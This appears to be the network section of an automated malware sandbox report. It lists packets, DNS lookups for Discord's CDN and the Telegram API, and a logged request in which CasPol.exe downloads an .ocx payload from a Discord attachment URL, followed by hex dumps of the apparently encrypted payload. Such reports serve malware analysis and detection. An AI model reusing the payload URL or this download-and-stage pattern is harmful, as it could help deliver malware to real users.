Nov 29, 2022 22:48:57.158550024 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.158592939 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.158631086 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.158782959 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.158828020 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.158982038 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.158982992 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.159054041 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.159110069 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.159267902 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.159296036 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.159296989 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.159384012 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.159518957 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.159646034 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.159646034 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.159674883 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.159715891 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.159904003 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.159976006 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.160209894 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.160209894 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.160259962 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.160301924 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.160365105 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.160569906 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.160569906 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.160626888 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.160665989 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.160794020 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.160949945 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.160964012 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.161021948 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.161149979 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.161302090 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.161312103 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.161312103 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.161365032 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.161633015 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.161633968 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.161945105 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.162139893 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.162138939 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.162199974 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.162311077 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.162431955 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.162432909 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.162432909 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.162484884 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.162508965 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.162524939 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.162723064 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.162878036 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.162923098 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.163114071 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.163136959 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.163271904 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.163312912 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.163435936 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.163605928 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:50:36.499083996 CET	49854	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:36.499111891 CET	443	49854	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:36.499264002 CET	49854	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:36.504544020 CET	49854	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:36.504556894 CET	443	49854	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:36.555190086 CET	443	49854	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:36.555372953 CET	49854	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:36.557010889 CET	49854	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:36.557038069 CET	443	49854	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:36.557495117 CET	443	49854	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:36.574016094 CET	49854	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:36.592070103 CET	443	49854	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:36.593067884 CET	49854	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:36.636323929 CET	443	49854	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:53.639071941 CET	443	49854	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:53.639152050 CET	443	49854	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:53.639327049 CET	49854	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:53.642487049 CET	49854	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:55.844460964 CET	49855	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:55.844508886 CET	443	49855	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:55.844652891 CET	49855	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:55.844996929 CET	49855	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:55.845009089 CET	443	49855	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:55.888237953 CET	443	49855	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:55.889772892 CET	49855	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:55.889801025 CET	443	49855	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:55.922514915 CET	443	49855	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:55.923414946 CET	49855	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:55.923439026 CET	49855	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:55.923463106 CET	443	49855	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:55.923487902 CET	49855	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:55.923505068 CET	443	49855	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:55.923712015 CET	49855	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:55.923722982 CET	443	49855	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:55.923872948 CET	49855	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:55.923901081 CET	443	49855	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:56.187952995 CET	443	49855	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:56.188028097 CET	443	49855	149.154.167.220	192.168.11.20
Nov 29, 2022 22:50:56.188170910 CET	49855	443	192.168.11.20	149.154.167.220
Nov 29, 2022 22:50:56.188560963 CET	49855	443	192.168.11.20	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 22:48:56.855335951 CET	50313	53	192.168.11.20	1.1.1.1
Nov 29, 2022 22:48:56.865253925 CET	53	50313	1.1.1.1	192.168.11.20
Nov 29, 2022 22:50:36.482291937 CET	57620	53	192.168.11.20	1.1.1.1
Nov 29, 2022 22:50:36.492578030 CET	53	57620	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 29, 2022 22:48:56.855335951 CET	192.168.11.20	1.1.1.1	0xf7f5	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 22:50:36.482291937 CET	192.168.11.20	1.1.1.1	0x1e1d	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 29, 2022 22:48:56.865253925 CET	1.1.1.1	192.168.11.20	0xf7f5	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)	false
Nov 29, 2022 22:48:56.865253925 CET	1.1.1.1	192.168.11.20	0xf7f5	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)	false
Nov 29, 2022 22:48:56.865253925 CET	1.1.1.1	192.168.11.20	0xf7f5	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)	false
Nov 29, 2022 22:48:56.865253925 CET	1.1.1.1	192.168.11.20	0xf7f5	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)	false
Nov 29, 2022 22:48:56.865253925 CET	1.1.1.1	192.168.11.20	0xf7f5	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)	false
Nov 29, 2022 22:50:36.492578030 CET	1.1.1.1	192.168.11.20	0x1e1d	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cdn.discordapp.com

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49847	162.159.133.233	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-29 21:48:57 UTC	0	OUT	GET /attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocx HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: cdn.discordapp.com Cache-Control: no-cache
2022-11-29 21:48:57 UTC	0	IN	HTTP/1.1 200 OK Date: Tue, 29 Nov 2022 21:48:57 GMT Content-Type: application/octet-stream Content-Length: 222272 Connection: close CF-Ray: 771e8ce8b9b7917c-FRA Accept-Ranges: bytes Age: 16459 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename="bnezjstiSAD111.ocx" ETag: "b74dd7ae0691ff37f3fbbcb91fa081db" Expires: Wed, 29 Nov 2023 21:48:57 GMT Last-Modified: Tue, 29 Nov 2022 15:26:36 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 x-goog-generation: 1669735596467966 x-goog-hash: crc32c=0UbuyQ== x-goog-hash: md5=t03XrgaR/zfz+7y5H6CB2w== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 222272 X-GUploader-UploadID: ADPycdtjTL9RBDUfmSVR5nBlxiMdB0JHWwLKwu6JD25GdZo9GsuqtJBB1im3XXeUsfeQUfYos2sGazN5KwcSvD66eQ1AhA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lvhkiN67weHTJkWraTE8zHLDUuuJXMA6oUZeNyWDmxJ%2B6T4pit9KLBBlw05dIgl2IClEyqTe7B5d7dkzRxuhLpR%2F8Lv4er%2B%2F7xnOz8drWgB36p9p0b3z6S3jlKUWRT546DPf2Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare
2022-11-29 21:48:57 UTC	1	IN	Data Raw: f5 d5 26 87 c2 b6 49 71 91 50 33 fd 3d 0e a1 06 65 c0 19 54 d2 84 e1 55 78 6e d4 cd 19 54 56 9b cb d9 30 74 19 23 8a Data Ascii: &IqP3=eTUxnTV0t#
2022-11-29 21:48:57 UTC	1	IN	Data Raw: dc 4a 89 6c bc ac f8 bc ea 3d 3e 08 b7 51 45 79 0a c0 88 72 0a cd 5a 02 af 6a 0f 79 82 65 c1 a6 c6 e8 e9 41 d3 5e 2a 3c a0 66 e6 82 04 f9 c1 5b fc 1e 78 79 c3 d6 6f 58 5d cd f2 66 3f cb fb c7 8d f5 fc de 0c d9 9a 73 4d 69 df 86 97 dd 04 b8 5d 97 e7 84 5b 5f fb 84 ea 06 a8 ae a8 d0 10 10 d8 c4 46 d9 f8 f0 9a 42 bf 4f 04 79 b4 09 84 60 94 99 56 c3 d8 34 02 9d e8 29 e8 6b 31 74 95 84 66 1a 9e b0 ce 75 74 67 bd e6 98 d9 5d c7 8d bd f2 21 f1 75 50 0c 46 0c 78 e6 91 52 8b 9d be ff 0b ef ee 10 7c d9 d0 fb 5d 0a 6c 31 d7 23 c1 fd 70 9d d6 2c a3 cc f0 e4 85 25 ed 57 0e 77 13 35 9e 29 03 0f a1 9e 74 87 b7 8d 34 ee c0 3f c3 8d 8e 85 4a 17 3f 6a 7e 89 49 c9 17 ee ca 67 f0 9a 2a 5a a3 c5 ea 0d 89 fb 1c 92 31 eb bd 6f 48 7d 49 d5 1a a8 9c b0 5c 5a 7d ef ff 53 8a 8f 74 Data Ascii: Jl=>QEyrZjyeA^<f[xyoX]f?sMi][_FBOy`V4)k1tfutg]!uPFxR\|]l1#p,%Ww5)t4?J?j~IgZ1oH}I\Z}St
2022-11-29 21:48:57 UTC	2	IN	Data Raw: e4 0b 66 bb 23 38 09 d6 b8 f5 50 2a 62 c6 1f c5 b2 c8 7d 72 b4 35 ff bd f1 b2 90 3d 07 cb 71 00 f0 7c 5b 6a f8 10 1a 09 6e e6 26 a8 ba 69 b6 a4 2a a8 8e 72 2a 01 70 3c fe 38 d6 51 49 11 ff ba cc 26 c0 29 41 9b 6c f0 bd ef 97 63 f8 02 08 1f 76 02 15 97 f8 78 81 0b 55 b4 e8 70 6b 10 91 ad ec cb 3a 17 d0 a9 c2 1d 73 e2 62 e3 e7 e1 66 6e 10 09 36 84 fc a4 47 1c a5 80 59 1c cc 55 3e c6 6c 35 08 31 74 42 d2 98 ec 50 f8 b8 65 02 a3 b0 27 4c 42 0a d9 8a 64 97 b3 43 41 f5 90 79 93 14 ba 35 bb dc ca 82 30 c4 2f c5 7f f3 16 31 54 19 a9 a2 81 0f 67 78 05 f3 1e 60 2b 2a cd cb dc 14 a9 83 c6 20 21 31 5b 8f 77 01 aa 40 e9 82 67 cb a0 d0 c4 c7 43 d3 a7 77 3a 20 fb e6 82 00 ed 41 7d fc 5e 7c 6d 43 f1 6f 58 59 d9 72 4e 3f cb ff e7 c6 b1 be 93 24 c7 9a 73 47 e9 f3 86 97 d9 Data Ascii: f#8Pb}r5=q\|[jn&irp<8QI&)AlcvxUpk:sbfn6GYU>l51tBPe'LBdCAy50/1Tgx`+ !1[w@gCw: A}^\|mCoXYrN?$sG
2022-11-29 21:48:57 UTC	4	IN	Data Raw: 9d db bb fb 26 9b bf 11 51 fb 5e 19 a3 19 2e a7 cc e3 1d 9b 32 e1 5a 93 82 bf e9 83 ba 4a 29 7a 77 26 de 5b 69 bb 2e 63 40 f5 3b 3c 7b 1b 99 eb ad 22 34 51 97 05 eb 9c d5 17 89 66 8f b3 a4 cd 1e 69 16 96 81 50 3b 05 a0 4d 4c cc 6c 7f c0 6c 61 0d 87 be a2 c8 bc 57 69 80 e5 2c b6 64 0d 88 05 40 75 bb 08 58 0f 6c 55 16 14 07 b0 41 c8 54 f3 5b 42 02 1d 55 16 f7 6c 34 4e 0b 74 b6 7b fb 36 f0 a9 85 71 10 82 55 91 be 15 48 ec 00 42 d9 49 e1 70 0f 02 1f 97 88 d6 41 37 4f 49 17 ec 5e d8 6c 3d a2 5e b8 52 2d cd db fa ae 32 c2 ad bb 2d 7b 08 70 27 36 20 96 d7 ae 69 45 0d 5e c3 0e c5 1a 8b 7f 72 b6 0c d7 d0 cf b4 10 3b 16 cd 1a 28 70 71 51 b4 f0 21 ad 07 6e ec 0a b8 94 6b bc 7c aa d9 81 72 2e 13 d8 18 fe 38 d4 38 db 00 ff be e4 28 3e 28 41 9b 6c a6 9c ed 97 61 6e 39 Data Ascii: &Q^.2ZJ)zw&[i.c@;<{"4QfiP;MLllaWi,d@uXlUAT[BUl4Nt{6qUHBIpA7OI^l=^R-2-{p'6 iE^r;(pqQ!nk\|r.88(>(Alan9
2022-11-29 21:48:57 UTC	5	IN	Data Raw: 1a a8 0d b2 5c 1a ab ef ff 43 6e 8f 64 b0 f9 d6 22 de 22 5d 3a 38 02 ae e9 4b 76 a8 7c d0 98 d8 03 d7 06 13 38 d2 60 59 64 39 08 32 ed d7 0d 37 81 bb f0 7c 1f aa 81 7a 97 98 a0 f9 5d 87 01 c6 0b 80 ac 62 c8 b4 83 ea f6 45 d0 a2 03 e5 49 d9 d8 ae b7 c5 eb b3 de 46 c7 75 06 f7 7c 29 4f c4 f0 7f 81 4d 07 70 22 58 8d 66 dc c2 0e 08 fa d9 50 75 fb b2 a5 89 5e 47 54 c4 e5 e0 fe 06 de ad e7 63 57 1c ea 36 9a 56 9a cf 07 d9 70 11 d0 36 c4 88 17 05 30 5d fe 31 1d 2e 77 19 b4 52 77 31 43 83 8f 6a 10 24 50 1f 53 2a 37 63 20 ef ec 46 f2 95 d0 b4 d3 19 8d 41 1a a3 f9 37 01 a3 1e 30 27 c2 cf 1f b4 27 e2 c6 b9 82 ae a7 91 ba 77 2d 56 7c 58 d1 5b 69 97 63 49 7b f3 13 69 a5 17 bb f4 ff 20 3e 7f 87 21 eb 96 01 3f ea 5a 8f b5 86 ba 59 6b 1c b8 c4 3d 06 03 88 63 5f c9 77 52 Data Ascii: \Cnd""]:8Kv\|8`Yd927\|z]bEIFu\|)OMp"XfPu^GTcW6Vp60]1.wRw1Cj$PS*7c FA70''w-V\|X[icI{i >!?ZYk=c_wR
2022-11-29 21:48:57 UTC	6	IN	Data Raw: f5 fc d4 24 5d 9a 73 47 41 db 86 97 db 6b 38 5d 97 ed eb da df fb 8e f9 18 a5 04 8e 52 a4 19 1f cd fa d8 b4 3b d4 96 d7 26 7d 36 45 7b eb 0d f5 e9 29 f2 93 d6 6c f3 8d 2e 4d 09 54 5e f4 f7 1f 49 71 de ee 3b 28 30 e3 0c f7 bd 32 e5 a8 38 f8 05 fb 5d 72 0c 46 0a 6b b3 dc 4d b9 bb cc 75 0b fe a9 fe 0c dd bf 71 5d 0a 66 27 de 61 d0 f9 59 1d d7 27 a9 c6 ac f5 97 33 f3 7f 82 77 13 3f 8f 45 69 1f b7 88 7c 0b b7 8d 3e ff d3 2e c4 a2 03 85 6a 1d 4c e4 7c 89 43 c6 06 e8 cd 76 f5 8b 2e 31 2c c5 ea 07 8e ed 76 fd 61 e8 bd 65 34 73 49 d5 1e be af 93 22 1d f8 ef fb 7a 85 8e 64 b0 ef d1 4d a9 22 5d 30 10 78 ae e9 41 26 92 7c d0 e4 fe 3b 2f f4 13 38 ac 64 59 64 3d 1f 01 f1 ff 6f 35 81 bd 8d 56 1f aa 2e 52 bf 98 5e ff 5a 90 23 f4 0b 80 aa 44 f0 60 83 ea f6 3b de a2 03 e1 Data Ascii: $]sGAk8]R;&}6E{)l.MT^Iq;(028]rFkMuq]f'aY'3w?Ei\|>.jL\|Cv.1,vae4sI"zdM"]0xA&\|;/8dYd=o5V.R^Z#D`;
2022-11-29 21:48:57 UTC	8	IN	Data Raw: 30 40 31 69 f3 6a d8 95 c5 e9 65 78 1b 20 74 70 2a 3d bd d1 7e 01 19 7d d8 ee 58 5d 3a eb ab 6c d8 44 82 d4 81 f9 15 ad 94 ca c2 e7 e1 68 41 23 86 23 82 7c b2 54 19 b0 ad 7d 60 d4 53 be da ce 24 09 0e 6f 2d d0 9e 6a eb e9 bd 79 3c 58 aa 27 46 55 18 4b 95 1a 82 b7 6b 6b df ec 7f 13 02 18 24 ba d3 62 f1 32 c4 2d 14 e5 f6 0c 49 64 0c a9 a6 25 6d f6 63 03 57 27 72 37 54 d3 dd 5c 33 0b 92 c7 1e dc 15 5b 85 5b 8d 27 55 e3 fc f3 c1 a6 cc e6 c1 79 d3 a1 df e2 a0 f4 e6 82 45 cd c1 5b fe 5e 78 79 f7 d6 6f 58 7d cd f2 66 6b cb fb c7 87 f5 fc de 0c d9 9a 73 4d 69 df 86 c9 dd 04 b8 d6 95 e7 84 b2 dd fb 84 9a 08 b7 14 bc d0 a4 18 06 d5 fa d8 98 3f bb 16 c9 26 77 48 d2 68 ef 3f f5 fa 3b e3 bb 44 68 e4 79 5c e4 0a 4c 47 e3 f1 19 3e e8 c8 10 30 17 3a e3 96 f7 bd 3c d0 7a Data Ascii: 0@1ijex tp*=~}X]:lDhA##\|T}`S$o-jy<X'FUKkk$b2-Id%mcW'r7T\3[['UyE[^xyoX}fksMi?&wHh?;Dhy\LG>0:<z
2022-11-29 21:48:57 UTC	9	IN	Data Raw: 61 c8 9c be 08 06 05 aa 6f 67 c9 7d 70 36 24 1d 02 81 c0 a9 e0 85 53 06 b4 3b 20 94 2d 31 88 0f 62 65 f2 0a 52 d7 7b 12 1c 14 07 bc 8c c2 6d c2 77 23 17 39 e0 3d f7 66 eb 5d 2c c4 b9 6d e9 74 ed 8e a5 67 8c 99 72 b1 a8 89 53 3d 19 7e 45 59 ae 6a 19 9e 0e 84 93 dc e5 26 4c 4f 01 70 4e d7 71 6f 3e 53 d7 4c 37 4b ca f5 b0 3b d4 5d aa 2e 1c 02 6a a1 27 2f 88 dc b8 71 54 05 c6 c4 13 d9 32 c3 7c 72 b0 1d d0 21 6f b4 1c 2b 07 cb 74 0c 40 7d 5b 56 fd 09 9a 26 6e e6 33 a8 eb 69 b6 a4 a8 8f aa 72 2e 1d d8 65 fe 38 d8 32 ad 00 ff bb c3 37 68 bb 43 9b 6e f0 12 ef 97 63 0b b3 08 1f 78 45 98 95 f8 74 06 37 d7 b6 ec 5e 34 b6 91 ab 66 f6 a3 17 d4 8b f0 70 e9 e4 e2 ff ed e6 64 52 16 88 34 82 7a a5 ca 1b a1 a8 6a 0a d8 47 96 7b 6c 35 06 31 e1 40 d2 94 03 ee f8 b8 6b 13 4c Data Ascii: aog}p6$S; -1beR{mw#9=f],mtgrS=~EYj&LOpNqo>SL7K;].j'/qT2\|r!o+t@}[V&n3ir.e827hCncxEt7^4fpdR4zjG{l51@kL
2022-11-29 21:48:57 UTC	10	IN	Data Raw: 40 ac 62 c2 a3 f0 2b f6 45 da cd c1 e5 43 d2 df 86 2e c6 eb b5 db 6e 53 77 1c f1 54 e8 5c f4 fe 68 ad 8c 07 70 3e 37 4f 77 ca c3 22 78 6f dc 48 8d f3 b6 29 a3 03 41 7c 0e 8a c2 f4 11 a7 12 e8 63 5d 77 3e 1e b4 5c 9d ed 86 f5 4b 0e d2 1e 5b 93 e9 02 34 88 d6 7e 15 39 02 f0 e4 50 7d 58 97 9c bf 48 49 0c c9 17 75 36 35 4b bd fa 12 41 f6 57 c8 bf d9 09 e8 7e 1b 8f f1 4f c8 a3 19 20 de eb 78 1f 9f 23 c0 48 0f 80 b5 91 ba 7a 4a 2d 5c 6b 2b 10 5b 69 b5 5d 89 7b f5 31 31 8d 8a b3 dc ab 2b 16 e7 ad 05 ed be cb 17 f7 50 98 c0 6f e5 59 61 79 52 96 3f 0c 02 88 d8 5d c9 7b 73 c0 84 61 0d 87 e8 6d c8 bc 59 11 cd 24 2c bc 10 5e 4a 05 4a 57 f5 22 f9 0b 7b 3c 22 3c a5 b8 52 c8 6d 35 77 23 17 06 ab fc f7 6c 3f 32 c6 65 b9 67 e4 82 42 a4 92 61 85 bb fe 8b a8 8f 71 23 19 54 Data Ascii: @b+EC.nSwT\hp>7Ow"xoH)A\|c]w>\K[4~9P}XHIu65KAW~O x#HzJ-\k+[i]{11+PoYayR?]{samY$,^JJW"{<"<Rm5w#l?2egBaq#T
2022-11-29 21:48:57 UTC	12	IN	Data Raw: e4 c1 c6 09 3b 34 97 55 f7 ac 30 c1 46 b0 f8 03 9e bd 50 0c 4c d2 77 93 fc 65 8b d1 b5 ef 2b d6 9b f3 1d d3 0e fb 4c 02 44 d2 d7 c3 c7 90 b9 96 d7 2d 7d c3 8f cf b2 25 e5 5d 1d 56 3b 0d 9e 57 71 d2 a1 8f 5c af 6f 8d 34 e8 af f7 c3 cd 84 5b 65 32 17 5d 7c 89 43 de 35 c6 f2 67 f0 90 f4 5e b2 cd c2 19 88 fb 1a fd 39 e8 bd 65 94 71 61 e2 1a a8 96 9a 64 1a f8 e5 21 43 9b 87 4c 61 f5 d6 24 b1 ea 5d 3a 32 de a1 cc 63 39 a8 7c da f1 fb 2b ef f4 13 32 0c 6a 48 6c 11 c5 32 ed d1 60 ff 81 bb af a2 10 8f 00 4d 97 98 54 ea 79 af 33 c6 0b 8a 72 62 d9 bc ab 29 f6 45 d6 cd cb e5 43 d2 06 a1 98 ec dc b3 d2 4c d4 50 34 cf 7c 28 56 2a f4 6e d6 65 e6 70 34 5e e2 bf ca c9 2f 8e f5 fb 60 bc fa 9e b5 b2 25 6f 6c ce 8a c8 20 06 fc 68 ea 63 51 30 36 1e b4 5c b2 79 13 f7 4d 20 ff Data Ascii: ;4U0FPLwe+LD-}%]V;Wq\o4[e2]\|C5g^9eqad!CLa$]:2c9\|+2jHl2`MTy3rb)ECLP4\|(V*nep4^/`%ol hcQ06\yM
2022-11-29 21:48:57 UTC	13	IN	Data Raw: 0c 13 e5 51 92 89 44 8f fa b8 67 05 2a 82 e1 4e 46 1a 71 b6 64 97 bd c9 7e b7 88 57 d5 0a ba 33 b9 e2 d2 9f 30 ce 03 70 f6 f3 10 1f 5b 0c a9 a8 25 6d b3 61 2d 33 34 77 2d 3b cd f5 c4 37 a9 89 ea f0 a3 15 5d a7 54 16 27 5f 4b 93 26 e9 6b c6 ec e3 69 bd a3 d5 3a 88 f9 e6 82 0e 96 0f 5b fc 54 40 f2 c3 d6 6f 26 53 cd f2 62 28 35 fa b9 83 f5 fc da 14 27 9b 13 33 67 df 86 93 c4 fa b9 3d bb 88 95 5c f7 36 86 ea 0e a6 1d d8 c8 a4 19 11 cd d9 d8 b4 37 d4 d9 d7 26 7d 7f d5 7c c3 c9 e4 f8 3d e5 c5 4d 6c f3 83 75 ef 09 54 5e 88 3e 08 3a fd f8 ff 36 13 fb 9f 8b f1 ac 3e 97 98 b0 f8 01 d9 52 50 0c 4c 63 b7 b6 d4 58 ad c0 b8 d4 db fc a3 f5 15 a7 c8 fb 5d 0e 44 16 d7 c3 cb 90 be 96 d7 2d 85 dd ad 99 9c 25 e5 53 61 b8 13 35 94 71 a5 03 84 b6 63 87 b7 87 27 d2 e8 07 c3 cd Data Ascii: QDg*NFqd~W30p[%ma-34w-;7]T'_K&ki:[T@o&Sb(5'3g=\67&}\|=MluT^>:6>RPLcX]D-%Sa5qc'
2022-11-29 21:48:57 UTC	14	IN	Data Raw: a6 92 66 8c 93 5a 89 8c 8f 59 e3 17 54 45 58 dc 6c 19 9e 01 98 93 c0 c7 26 40 54 01 70 4f d7 30 2d 3e 4f b9 4c 3b 51 85 f3 b1 3b db 31 aa 22 7e 02 66 ba 27 2f 89 dc e6 f3 54 02 43 c4 1f c3 5e c5 7d 72 bf 1d d0 bf eb b4 10 30 07 cb 75 17 0b 77 5b 6a f2 09 9a 07 e7 e0 22 80 98 6b b6 a2 b0 a7 8e 73 2e 17 f0 2c 6b 3e d2 46 c7 00 ff ba 6b 36 40 3b 4e 9b 68 d8 89 ed 97 64 78 11 08 1f c0 2c 3b 95 f6 7e 01 1f 95 b2 ec 58 54 12 91 ab 76 de 3a 16 d4 81 f3 1f bc e2 e2 f5 e9 e1 62 46 e3 0d 36 82 73 b3 47 1c bb a8 6b 1f cc 53 be de 80 33 0c 19 49 40 d2 9e 96 4f f8 b8 6e 14 23 aa 3d 4c 46 1d 59 91 64 97 be 6c 6f f7 9e 7d 13 08 ad 3c bf ca 45 9f 30 c4 31 b6 f4 f2 16 37 7c 0c 8f ab 87 7c fd 78 05 f5 02 7e 2b 2a c4 dd 5c 37 b3 83 c2 37 a1 15 5b 8f 30 1f 27 55 e7 82 66 c1 Data Ascii: 